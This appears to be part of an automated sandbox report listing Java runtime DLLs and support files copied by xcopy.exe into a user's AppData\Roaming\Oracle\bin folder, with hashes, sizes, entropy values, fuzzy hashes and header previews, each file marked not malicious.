SHA1:F3035A756E2E963764912C6B432E74615AE07011
SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-runtime-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):22840
Entropy (8bit):6.942029615075195
Encrypted:false
SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
MD5:41A348F9BEDC8681FB30FA78E45EDB24
SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):24368
Entropy (8bit):6.873960147000383
Encrypted:false
SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
MD5:FEFB98394CB9EF4368DA798DEAB00E21
SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
Malicious:false

C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-string-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):23488
Entropy (8bit):6.840671293766487
Encrypted:false
SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
MD5:404604CD100A1E60DFDAF6ECF5BA14C0
SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
Malicious:false

C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-time-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):20792
Entropy (8bit):7.018061005886957
Encrypted:false
SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
MD5:849F2C3EBF1FCBA33D16153692D5810F
SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
Malicious:false

C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):18744
Entropy (8bit):7.127951145819804
Encrypted:false
SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
MD5:B52A0CA52C9C207874639B62B6082242
SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
Malicious:false

C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1188216
Entropy (8bit):6.621625944667242
Encrypted:false
SSDEEP:24576:FeBPoBpMrGXL94IuO6YhJZi+Z+BuKo5cKb3W8:kqEuKcVDW8
MD5:47ADDDEB091D2B18A28EDC94CCC69A4C
SHA1:325824889894CDA1884B080D2E95787FA595A95B
SHA-256:5D5C6E03AFA8DFF9CE79DCD968449D87A2DFD0EEABFCF393F182CFE29D00C3C1
SHA-512:91697400AD2634BB0A0F8A68717944DE76FAD0A3C882608A54550923A438EC6D7D2FEF3C9897A4486DD2165BA5A229E6698D4ADE030C7C0A682F78517F0F5D16
Malicious:false

C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):16248
Entropy (8bit):6.404770517933745
Encrypted:false
SSDEEP:384:hlosghOyGOOV/snPV5VGfuj+ep5JNNzFwhhiZ:hldghZW0ndvGfuj+ev3whK
MD5:51268021CC53E09ECB014DD7A72C0FBC
SHA1:6198413F05674EFE7BC3941C0C9977361EFC1964
SHA-256:71AD5441D8107CA7780115CC42017C8292A4AD36B889D4576612C747D2D8A0D1
SHA-512:BFD94F6DD499CBB7FFD547E2AA1A46EE8C23BDEEC32F72E28D169A7C21E2B991CCDCF795ABFEAA5F4DB01EA397E1B1802E546FA458538B1CAF3F5027C5ED2773
Malicious:false

C:\Users\user\AppData\Roaming\Oracle\bin\client\Xusage.txt
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:ASCII text
Category:dropped
Size (bytes):1423
Entropy (8bit):4.176285626070561
Encrypted:false
SSDEEP:24:N3ZYKm8fuW6psByGJjR0X46kA2SsGFhD+GbpGCOhLRr3n:mOLUskGJjyltsGFV+GbpGCOTr
MD5:B3174769A9E9E654812315468AE9C5FA
SHA1:238B369DFC7EB8F0DC6A85CDD080ED4B78388CA8
SHA-256:37CF4E6CDC4357CEBB0EC8108D5CB0AD42611F675B926C819AE03B74CE990A08
SHA-512:0815CA93C8CF762468DE668AD7F0EB0BDD3802DCAA42D55F2FB57A4AE23D9B9E2FE148898A28FE22C846A4FCDF1EE5190E74BCDABF206F73DA2DE644EA62A5D3
Malicious:false
Preview: -Xmixed mixed mode execution (default). -Xint interpreted mode execution only. -Xbootclasspath:<directories and zip/jar files separated by ;>. set search path for bootstrap classes and resources. -Xbootclasspath/a:<directories and zip/jar files separated by ;>. append to end of bootstrap class path. -Xbootclasspath/p:<directories and zip/jar files separated by ;>. prepend in front of bootstrap class path. -Xnoclassgc disable class garbage collection. -Xincgc enable incremental garbage collection. -Xloggc:<file> log GC status to a file with time stamps. -Xbatch disable background compilation. -Xms<size> set initial Java heap size. -Xmx<size> set maximum Java heap size. -Xss<size> set java thread stack size. -Xprof output cpu profiling data. -Xfuture enable strictest checks, anticipating futur

C:\Users\user\AppData\Roaming\Oracle\bin\client\classes.jsa
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:data
Category:dropped
Size (bytes):12976128
Entropy (8bit):5.075892707796089
Encrypted:false
SSDEEP:49152:C6lJZugkDzRPim7x/4VfGPjm92jR8MMQDlISsiiuhFVbD5NxLaJ3GJ2l8+KahaTG:C6lnTiLBbDxV+KIeMtO/RUuhKL3VhT
MD5:176B18D92F004C50C85619E97AC6CE06
SHA1:721419A2D7FB1D79A0BFC29415229FE84394FEC6
SHA-256:1E336709F6793AE3E06B36624E82C86B5F931B262CA819CF4948843F6DAA1441
SHA-512:33E458B45DA40962293C5484C10430692FEF81F1BBAEB3F8CCE26775F89F90997C6DBC1BD7569A4DDCED528529DC2AB437F4B6C92A1695C01165B440D2C2812A
Malicious:false
Preview: ....(........................O.....PV[.....$.....]...........Z.....`..a.......... .."........L....................Java HotSpot(TM) Client VM (25.211-b12) for windows-x86 JRE (1.8.0_211-b12), built on Apr 1 2019 20:53:53 by "java_re" with MS VC++ 10.0 (VS2010)..............................................................................................................{.......@... .O.........C:\Program Files (x86)\Java\jre1.8.0_211\lib\resources.jar;C:\Program Files (x86)\Java\jre1.8.0_211\lib\rt.jar;C:\Program Files (x86)\Java\jre1.8.0_211\lib\sunrsasign.jar;C:\Program Files (x86)\Java\jre1.8.0_211\lib\jsse.jar;C:\Program Files (x86)\Java\jre1.8.0_211\lib\jce.jar;C:\Program Files (x86)\Java\jre1.8.0_211\lib\charsets.jar;C:\Program Files (x86)\Java\jre1.8.0_211\lib\jfr.jar;C:\Program Files (x86)\Java\jre1.8.0_211\classes.....C:\Program Files (x86)\Java\jre1.8.0_211\lib\sunrsasign.jar.....C:\Program Files (x86)\Java\jre1.8.0_211\classes.....C:\Program Files (x86)\Java\jre1.8.0_211\lib\

C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):3893624
Entropy (8bit):6.832853157906678
Encrypted:false
SSDEEP:98304:xGprqNAVtyznigGJrIk4cnKPcv/GozRaESft:ir2zigGJ/4bcv/GozRaEQ
MD5:7740EDA81AD8EE6E2720AFFA70F2A8F0
SHA1:BFFB23858B2461E8D92378D2A3AC69F34C2DE8B9
SHA-256:D3980CA9BE247AE6293EAAD29DBBAEC9752D23CC3814B0F55C50C8E9E7576B64
SHA-512:4791D7A8F765CD9C7C1C035016F95D3CA6EF2673A5460F67ED62F894F3BA1C51F7B6482EEF8CEA03112093AA14DC63A44A59009E5044F0165D0997C367FD4CB7
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\concrt140.dll
Process: C:\Windows\SysWOW64\xcopy.exe
File Type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 248616
Entropy (8bit): 6.699964486884577
Encrypted: false
SSDEEP: 6144:fFSqgBLDeJkGOZAuaXE1TIh1MuyJ9eaJXUHKbOxA12z/W3NrrQ:fFRgMUlIh1ceLwOfz3
MD5: CF1F7F3E7C30ED97113B667A414FD5D3
SHA1: BE9F8FD21EC35CDE4669B30BD241C1B74BD1475F
SHA-256: 2423A2A62FE0369C610837E240D691DA727D95A9C1D5ADD512D0D0C32E328836
SHA-512: 9C9FDDF00ABEE52DBB65F14B711E7496EDF0A9D8A2D59CA299F40A30C79FD9EDB010FA19DC632D3F0BB840A747D787A2616D18050DE6376C4334D59F4CD1C8B7
Malicious: false
C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll
Process: C:\Windows\SysWOW64\xcopy.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 143736
Entropy (8bit): 7.3348881758771505
Encrypted: false
SSDEEP: 3072:XI63LPXAZP49o9NQSd5Ficcj5ojGylYCE2Iu2jGLF5A9bE8LUeVChc6:Y63DQZPYoi7IGgYCE2L1F5A9bEGUeN6
MD5: A6CDAECA9BE26E422B8AA12B32BCE96D
SHA1: AE2339B5805C07E2CECDB7F1E927E2EF8A153528
SHA-256: F014256B30AE006D5D8C6D20AF23957EF3886427027A54F3E2B0269F9B370D7A
SHA-512: 95FF04D89D90CF1A51729A739CBC0A34729C171038ECEC818CA02BFCC306D1D74F86639CC20B3F6C8AE4CC622F43950AF6326AA2231FCE189BEC39A2D3E90597
Malicious: false
C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll
Process: C:\Windows\SysWOW64\xcopy.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 65912
Entropy (8bit): 6.357102728130537
Encrypted: false
SSDEEP: 768:x2yd2l7Pfj2I5HZ70dLhVP6gd2qPoyvVfoNVXfjMGaJng2WcZw0TYqwMfFSmj+Wx:xhd2xyI5HidLvmXNZ8B/ZlZF4W3h3j
MD5: 57B272565D5F75696DF13DCE316259E1
SHA1: E69EE183500F57D8397283401F00F75F637B974E
SHA-256: B974E0EE2C36339348D3D1BB247C0F87345B8DE26558C79D823E6438DBB7E8AA
SHA-512: 3D2621499798C2638B9E5C0AF201170022C6B6E7125109ACED65FC56A6529981730F9207E6324103FDCE017081B5DC59E327D8E4B75158114A62FCBA65D5775E
Malicious: false
C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll
Process: C:\Windows\SysWOW64\xcopy.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 450424
Entropy (8bit): 6.4842742283868215
Encrypted: false
SSDEEP: 6144:08nJJb3ytYn404Y+nTMCRf6Unf0Uvm0a/GCMOBpPMZhvxIW1G2s4:08nJFdn40lCRN3vm0bhvq+5l
MD5: 9EA3A4F24D6292358E7E43DA26E1628F
SHA1: E5013F669FBC01A71DFA6749890296E680549E33
SHA-256: B215F07FBCEE8F5377FFEA827031578DB6039D85FABD24364F6A7E2C08061BCA
SHA-512: 3065C8AA9FA0DCC76D10F021540BF8190E1D3AAD6EB0A2409CDF81CF963FCDCB86C01C3A72786DB53E96E5B482C213373CF822BE2A7D9C0B1735A34355C3AEE5
Malicious: false
C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
Process: C:\Windows\SysWOW64\xcopy.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 25976
Entropy (8bit): 6.62242768383478
Encrypted: false
SSDEEP: 384:lQgxsj7ttB+su6+XJ6ZEPG5AvLysj+U8JN77hhr0:CYsftt3yJ6W+qysj+X3hN0
MD5: E5AD94B64C56549004C5693205C771C3
SHA1: A48FDA83C913E6D4A07C77528B2AFF2A19378ED1
SHA-256: 0DB40E78C297C2ADC8A1F6CC4ECDA5394A7475C4480CF9D9167AD5864121C966
SHA-512: BADF714F141CD67E09F338A3AE59513B299E88E2D8F45B6203BDE7CAD859D39171F3017F85823B1F08084B4C8C25176185BF9882D71843E4132EF50F465DE126
Malicious: false
C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll
Process: C:\Windows\SysWOW64\xcopy.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 22392
Entropy (8bit): 6.5739275729345215
Encrypted: false
SSDEEP: 384:pwdi4i9u1aIVW98YyeWNrpPVowEj+5h8JN77hheTb:edi3lk28YyeorpdowEj+5O3hQTb
MD5: 0D7372D29D1C55EC40CB607407B3656F
SHA1: 932C5AEA84FF316755612C59697375F4B606048C
SHA-256: 166BD1A5BED22865AAC6553F6310A3B041A7EB07C6E1EE6E5B57978111D3F12F
SHA-512: 7E0635E5514F7D8C29575A9B5A256E5CF1F9DF5D9284A0D80E828DF867F77EDE4DB0F61E1A143638BCACD734662276BB5AE45DFF186BDEAF1FC9D382B44BFAF3
Malicious: false
C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
Process: C:\Windows\SysWOW64\xcopy.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 828792
Entropy (8bit): 6.011886939858762
Encrypted: false
SSDEEP: 12288:qwDvfi2WLzqRaOm3fyNrsYzQEGK+3zV6WvChbOso6C6QJ1eeVRQ:d7fi2WLzm7m3fyNIYzQEI3zG
MD5: D409990C4F01CE760648062912F77FF4
SHA1: EA3D13210612BC5F4F42DB4051761171108E1015
SHA-256: AD8CB9361A6DE607B30FD50179E8A684CE33A3D34FA254525FCEBC1AA18EF523
SHA-512: 262767DC714BBDB5B34C7D744EC61A6895A7476A6EB9DC19E70629743B0CBCC5AAFFC7F5AEF074660BED2F60DD44E8745A0541D88D4ACA10633AB9EFDE3D9740
Malicious: false
C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):908152
Entropy (8bit):6.157185879144199
Encrypted:false
SSDEEP:12288:LFJW4QO9/dp0+4jFRxIlSf5W5serPeUnvilkb6M1gIWvChbOso6C6QJueeWXXcsr:hJW4Qudp0+wFs45W5sanv7j1f6X28
MD5:0B4E6A3821A6F13128B6622A6E54071C
SHA1:938A60B7CB50320D8C4645DCA5B2F5253F8DE0ED
SHA-256:4910113DBE7507A26D93952B5F99EF7E77C4A30CB9B90F2D6FCA62B8E9190546
SHA-512:C8A2D2CE328B053F10DB20269A7311E4E14C53B7AE2BD4412058367EF9CA880CB6557407D41BED822744126B6C9B621AFB73DEBEFFDA071C5A04D37372C0C3EA
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):109944
Entropy (8bit):5.91774227064997
Encrypted:false
SSDEEP:1536:niEPbKJlXgZoGs34aljI8qXztsFaiEpOBbsO4lunk53hXl:iAbSgZW33lVqj+EiEpOBIO4lr3l
MD5:F4FC8F04E9431C03507AAA6628445404
SHA1:73426FE18B7CD5687B3F7999CD4D76867538F0AB
SHA-256:428F3B85C6FC07E0E70287B4100AE12F1F3FC397E63A64F363E26239A5DD382D
SHA-512:CD2652D31FCF505582EA1E11C9246706230B676C6B7F76B75A262835D63918AA0DFD943BCB4205F1E091CDC57A8F385250FB130F45222249B2B0611E31DDB47E
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):227192
Entropy (8bit):6.470482613611216
Encrypted:false
SSDEEP:6144:LsNKsu7tpbB4+UXtpqbr5FSh+8STFGMReiD72t6OBhhA:YNKsu7tpbB4+Wtpqbr5FSh+X5GSoY
MD5:14DD2A294E9415A617177D628C80F787
SHA1:5C848C6FC59E0418A9325AF48F54B24E0810A636
SHA-256:3AAC1ED7F377A471002A830EBC35933BDC5B2E3EB149C249F44D614E78D71B89
SHA-512:A7BC09E08E26FE418DCA229017270501F36C1EB488FCF00AC86284FD5D6F41C020C64B6408F1605C74D80E236B05B4062B4A1CBE2F50E5E7CBA36D42B5055B1E
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):154488
Entropy (8bit):6.504807977722444
Encrypted:false
SSDEEP:3072:6k0xjiMw46pRBakBDGSKdvngxDbZ7MRfGr5HGDW3auxbx:qjiM6mmiSKdsN7KfKIW3Fx
MD5:198378FD6F624BF34194BB24E29D5F04
SHA1:5178D0C769778E766CF7C56264C3AA12FE3260B1
SHA-256:390E62F1CDD8DFA47565547C9F7805D10890C86588E5285216C9E5D18539A374
SHA-512:165D2C0F4F9433A9E29D022630F82C471A54CEB9D994A2C34867F5B5DCC827920ED4D6A88FA73E66763422CFC52D11C3370FA1CC5773DB4C858E271276B4025B
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):216440
Entropy (8bit):6.427045773449867
Encrypted:false
SSDEEP:6144:HlG7qMlz6ojZw2Q6Eb17zosGSLW47BsA+h4:FG71z6ojZwz7z/HL986
MD5:3E8D0880879A1E36C0D5DA515C8139E3
SHA1:3627BEC3FC1DDC1D21470173018936687ED509E5
SHA-256:5D0C5FDF0C716E8964AFFC563F6C7198EC46F51486F4A9346CB592A5DEEC1DD4
SHA-512:6C6A360A3ECDC5B5BCA6F16781DD173BAFED7EE503482EF45C8FE38E05BC56AE1D3BBF6811302387586817564E24E37B3D73E851AD47A6201E8C48152C909423
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):600952
Entropy (8bit):6.18356989077687
Encrypted:false
SSDEEP:12288:lhEIYZl475HefXezhFTpB9un/veVnHdyPII3EiV+eaVT:TmZl8HefXezhFTdzdHdIILs+eaVT
MD5:0E4C62678621938644198E73A3A6203A
SHA1:A56FF96755C47F068B55771290528A9249D73DC2
SHA-256:F7113CC124BC55839238E2110534CC7A8D3373E4919E1D4EDE4E76C8CA24F03F
SHA-512:7FAF4D6E4586D55163D2B07F67629374783CE9B9E74551B489F1689480A36B7A6B99329929D861A8B04C0D494E1D3B62476685EC0D68620636DF38506582CCE8
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):743288
Entropy (8bit):6.723795053093137
Encrypted:false
SSDEEP:12288:Q57+rmVuj0ks5YDlLsi/UtY8Rtw8FhGSeENli2knXSUEknwLQEsfvc6D5RlWGyci:K+rT0krlQiG3tvhbeMkXS+w0RQ
MD5:D55C8440D84ACF28878F18C3CE1B2597
SHA1:3B21E119A7956482284A9C4C112A7F27E8343689
SHA-256:210C28AAB1592B8213A2B2909640602E26C3D65A42B333B6BF33ED5016AB1F56
SHA-512:C3B5FA5FB40856CA891122DADD9A3F4B0C3DA7962354678C8D844D1734E5372476B44274E7EEB01C44EFB2AD589CD7B429F25E2624A8071F63FC0303951A5F15
Malicious:false
C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):133496
Entropy (8bit):6.673761407092987
Encrypted:false
SSDEEP:3072:b0V2kbLSSaDdr8814VRGx+wEG4lgb371xiEvtmqdrkCB/jKChyNCY0:ibL9q4M11jKe+J0
MD5:560352A60930E13DCF009FDC21D285E9
SHA1:E3BEE840439183174FF4515817ED2D0C3298B9B4
SHA-256:C74610342A1DF8ED01DBFD9638E24B72B1942973C2EB844C7E0B92863AEAFAFC
SHA-512:2CDB4B03A6A7AE5F83A9C86491949E7D180309CE6215921D37C5C229BF26EF200BA14B41A7ADF115563532825A7882B9D99D7580F482597DB30BC9CEE39A85BA
Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........vu^............8Y...............................o..............................................Rich............................PE..L.....\...........!.....z...x......_........................................ ............@.............................i...|...d.......................x........................................... ...@...............d............................text...Ny.......z.................. ..`.rdata...N.......P...~..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):117112
Entropy (8bit):6.75718536073561
Encrypted:false
SSDEEP:3072:Oeq+/VOu1/k6n63ycdxMULqMe1UfTBfrUkgnEKb:OeqaFk663yUOULq71UfTBQ3b
MD5:3803A4CA553543BA62A27429FFD01BB1
SHA1:3C1D3D8F10BA54F8A7C0345ADBEF28E99FCABABD
SHA-256:64EE3AE58581F3D0DDAB52E84293AF24DB52CEE6C27634697CE47C9D029B72B6
SHA-512:1C4C95A49200F481E2E58DB547282C453DFEDEDEDCE4775D8A207F52DCA671B661F06A7A7AB2F854C514D3232DA20A6033FA46D74CA9C5CE676B9174DD3E178C
Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........g0...c...c...c..c...c...c...cP..c...c.|.c...c.|.c...c.|.c...c.|.c...c.|.c...c.|.c...cRich...c........PE..L.....\...........!................8........0.......................................]....@.........................`...........(.......................x...........p1..............................H...@............0..0............................text............................... ..`.rdata...f...0...h... ..............@..@.data....,..........................@....rsrc...............................@..@.reloc..b...........................@..B................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):17272
Entropy (8bit):6.505530589091723
Encrypted:false
SSDEEP:384:DIoJkyh9wlSZnDonPV5CyEbbXj+fI8JN77hh1f:DBJkWWoJkndKbTj+fr3hLf
MD5:89FFE1C55ECA478EB147CAE6452E4E5D
SHA1:568237B73667C1CBB1DEC349E71DC4BB8C0BF433
SHA-256:EB4A811A4BE7820B8C43D923B447D6D356141B7B82A372C13E0B5524D504FB29
SHA-512:8BAD680D0CF79CCBDB4C355B40BB9BBE00E12A37FE3705F6529F67C618F9E640E89E70EF982EDD071E93CDA017D0BBAA58B912F45B4D66D6D2B0F33AB96DD4CB
Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3...w.x^w.x^w.x^...^v.x^l..^u.x^l..^u.x^l..^u.x^~..^r.x^w.y^[.x^l..^y.x^l..^v.x^l..^v.x^l..^v.x^Richw.x^........PE..L.....\...........!.........................0...............................p............@..........................7.......2..P....P...............(..x....`..`....0..............................`1..@............0...............................text............................... ..`.rdata.......0......................@..@.data...h....@....... ..............@....rsrc........P......."..............@..@.reloc.......`.......&..............@..B........................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):53112
Entropy (8bit):6.5535314618132645
Encrypted:false
SSDEEP:1536:/+BduP0Ds762bvlcfNpJ2jApICRrZT9ixHCWaBo/vu0rV9LrBH1bjPEwhEdheBws:/+/ucibSfF2jRksWpJNG
MD5:739F1EDB0882495179258424D34B7F33
SHA1:1AFB3000419BAED6F3D9E7A6DD638B5A448E4066
SHA-256:0E889F5159CA3C24E162CE3D786E5E3FA7A9794376D9E16251E3C76885352FA7
SHA-512:94CF49FE6A5D089B4FA751FFC4C8C8AD75FD788E607A7F49B6BDE1D1256CAF301A1AD834CFCFD084BCC261CAA253FA1C50B7B1082114E04B5FAFE991BFDE26F8
Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O^;w.?U$.?U$.?U$.G.$.?U$...$.?U$.?T$&?U$...$.?U$...$.?U$...$.?U$...$.?U$...$.?U$...$.?U$Rich.?U$........................PE..L.....\...........!.....z...8......\.....................................................@.........................p...u...\...<.......................x..............................................@............................................text...nx.......z.................. ..`.rdata...'.......(...~..............@..@.data...............................@....rsrc...............................@..@.reloc..|...........................@..B................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):20344
Entropy (8bit):6.3904490465869035
Encrypted:false
SSDEEP:384:4qGHJW0MQYLRVvWIE0PVlKsogj+zst8JN77hhZutH:4xHmQYN8kdQpgj+AK3hDuJ
MD5:A7ECC63FA2B4E44DD472ECB0F8123A95
SHA1:D2796DAAF3FF8072776310D845C09E5B5A2DA4FE
SHA-256:DE4E517272D8438072211570EE1E4B53DB44652218917F88B873B1E0E56CE93D
SHA-512:820B001B37B777C8C6BAEC6FE61E163127C192855C1F158E1523BBE896A833581B1E7EC3B2F4156701574B11C9D6DFCE10A655D820E3597BF414A7B618636790
Malicious:false
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."..|fl./fl./fl./}.(/dl./}.*/gl./}../dl./o.'/al./fl./_l./}../kl./}.//gl./}../gl./}.)/gl./Richfl./................PE..L.....\...........!.........................0...............................p............@.........................@=.......7..d....P...............4..x....`..H....1..............................`6..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....@.......*..............@....rsrc........P.......,..............@..@.reloc.......`.......0..............@..B........................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
Process:C:\Windows\SysWOW64\xcopy.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):31608
Entropy (8bit):6.4517990036237896
Encrypted:false
SSDEEP:768:pHhfWinfwUFAvnbETIUh+naSOu91VQ5yj+p3hsHV:Huin5FAvoTIUh+nb1VQ5Jp3hsHV
MD5:8778B12BCD40FF36BD4377D6D448BE29
SHA1:2D60AA91BED94C28054307C80020A4CA6DFE3622
SHA-256:F645BE3BA8F0BAFE1BAC89E813E13140D7FBA2112BBFF967D32918D8579BBFA5
SHA-512:CB02B744F9E57145CCB96F1A30838F891912EB5A1499D47B578F09A37D1F470D2B159796B83C4960475D0ED39739923DB344096902A44728D7EB655050C5A5BE
Malicious:false
